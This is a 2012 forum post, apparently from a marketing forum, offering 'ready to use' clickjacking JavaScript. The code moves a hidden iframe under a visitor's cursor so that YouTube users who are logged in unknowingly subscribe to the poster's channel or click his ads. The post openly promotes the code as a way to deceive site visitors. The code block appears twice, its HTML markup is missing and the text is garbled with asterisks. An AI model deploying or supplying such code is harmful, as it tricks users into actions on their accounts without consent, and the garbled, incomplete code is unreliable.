
01-30-2012, 07:35 PM
|
 |
BOSS
|
|
Join Date: Jan 2012
Posts: 640
|
|
[Platinum] ClickJacking / Auto Subscribe YouTube
[GET] ClickJacking / Auto Subscribe YouTube
ClickJacking / Auto Subscribe YouTube
I hope you will like these useful sharing. Here there are ready to use codes. You use them on youtube as a ClickJacking as you know it provides you an invisible pages. Users thinks they click other thing which they interest but actually they click which you replace there. So you will get which click you want. It is really good way to get click to your advertising.
Here is writen a piece of code to make your visitors (who logged in youtube) auto subscribe to you.
Example html file
Code:
****
********Auto Youtube Subscription
****
****
********Hello !!! Welcome to my site!
****
********
****
****
********var iflag = 0;
** *var icontainer = document.getElementById('icontainer');
** *var iframe = document.getElementById('i_frame');
** *function mouseFollower(e){
** * * */* * * * * * * * * * *DO NOT EDIT THIS * * * * * * * * * * * * */
** * * *x = (!document.all)? e.pageX : event.x+document.body.scrollLeft;
** * * *y = (!document.all)? e.pageY : event.y+document.body.scrollTop;
** * * */* ------------------------------------------------------------*/
** * * */* places the iframe at the tip of the cursor, to make it clickable */
** * * *icontainer.style.left = (x - 13) + 'px';
** * * *icontainer.style.top = (y - 35) + 'px';
** *}
** *document.onmousemove = function(e) {
** *****if (iflag == 0) {
** *********mouseFollower(e);
** *****}
** *}
****
****
Insert before your :
Code:
****
********
****
****
********var iflag = 0;
** *var icontainer = document.getElementById('icontainer');
** *var iframe = document.getElementById('i_frame');
** *function mouseFollower(e){
** * * */* * * * * * * * * * *DO NOT EDIT THIS * * * * * * * * * * * * */
** * * *x = (!document.all)? e.pageX : event.x+document.body.scrollLeft;
** * * *y = (!document.all)? e.pageY : event.y+document.body.scrollTop;
** * * */* ------------------------------------------------------------*/
** * * */* places the iframe at the tip of the cursor, to make it clickable */
** * * *icontainer.style.left = (x - 13) + 'px';
** * * *icontainer.style.top = (y - 35) + 'px';
** *}
** *document.onmousemove = function(e) {
** *****if (iflag == 0) {
** *********mouseFollower(e);
** *****}
** *}
****
Enjoy!
|